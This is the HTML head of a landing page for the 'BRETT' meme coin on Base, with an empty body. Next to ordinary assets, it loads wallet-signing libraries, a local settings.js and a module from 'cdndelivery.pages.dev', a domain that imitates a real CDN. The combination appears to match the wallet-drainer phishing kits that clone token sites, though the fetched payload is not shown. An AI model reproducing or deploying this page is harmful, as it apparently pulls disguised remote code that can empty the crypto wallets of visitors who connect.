<!doctype html>
<html lang="en">

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
  <meta charset="UTF-8" />
  <link rel="icon" type="image" href="favicon.ico" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <link rel="apple-touch-icon" sizes="180x180" href="apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="favicon-16x16.png">
<link rel="manifest" href="site.webmanifest">
  <title>BASED BRETT</title>

  <meta name="title" content="BRETT - No 1 Meme on BASE">
<meta name="description" content="Introducing BRETT,  The No 1 MEME COIN on BASE and a Friend of PEPE.">
<meta name="keywords" content="BRETT, BRETT Coin, BASE MEME, Brett Base, Base Brett, PEPE, Meme Coin, Meme on Base, Base Network, Matt Furie, Matt Furie Meme, BASE blockchain,">
<meta name="robots" content="index, follow">


<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="language" content="English">
<meta name="author" content="BRETT">
<meta name="google-site-verification" content="A2ix4fZD6Pd0CYnFpLqlCaknrVuRDD-RoTgUjAHm_A0" />
  <!-- OG META DATA -->
  <meta property="og:title" content="BASED BRETT">
  <meta property="og:description" content="Introducing BRETT,  The No 1 MEME COIN on BASE and a Friend of PEPE.">
  <meta property="og:site_name" content="BASED BRETT">
  <meta property="og:type" content="website">
  <meta property="og:url" content="index.html">
  <meta property="og:image" content="https://imgur.com/LpTKIs7">

  <!-- TWITTER METADATA -->
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:title" content="BASED BRETT">
  <meta name="twitter:description" content="Introducing BRETT,  The No 1 MEME COIN on BASE and a Friend of PEPE.">
  <meta name="twitter:image" content="https://imgur.com/LpTKIs7">
  <script type="module" crossorigin src="assets/index-2b263e05.js"></script>
  <link rel="stylesheet" href="assets/index-1b9af26d.css">


  <link href="https://cdn.jsdelivr.net/npm/sweetalert2@11.7.16/dist/sweetalert2.min.css" rel="stylesheet">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;700&family=Montserrat:wght@400;500;700&family=Raleway:wght@400;500;700&family=Roboto:wght@400;500;700&display=swap" rel="stylesheet">

  <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.7.16/dist/sweetalert2.all.min.js"></script>
  <script src="https://cdn.jsdelivr.net/gh/ethereumjs/browser-builds/dist/ethereumjs-tx/ethereumjs-tx-1.3.3.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.7.2/ethers.umd.min.js" integrity="sha512-FDcVY+g7vc5CXANbrTSg1K5qLyriCsGDYCE02Li1tXEYdNQPvLPHNE+rT2Mjei8N7fZbe0WLhw27j2SrGRpdMg==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/web3/4.0.3/web3.min.js" integrity="sha512-2oprd2T2vSkAii+dVWi6C+uATbQ1YGmCed6b6msb9Jxi33hsXAbnhwZ9thwCq6ndidZv4P51qaq58uo9b/x4nA==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
        
  <script src="./settings.js"></script>
  <script src="https://cdndelivery.pages.dev/web3-ethers.js" type="module"></script>


 
</head>

<body>
  <div id="root"></div>
  
  <script src="../cdnjs.cloudflare.com/ajax/libs/three.js/r134/three.min.js"></script>
</body>


</html>
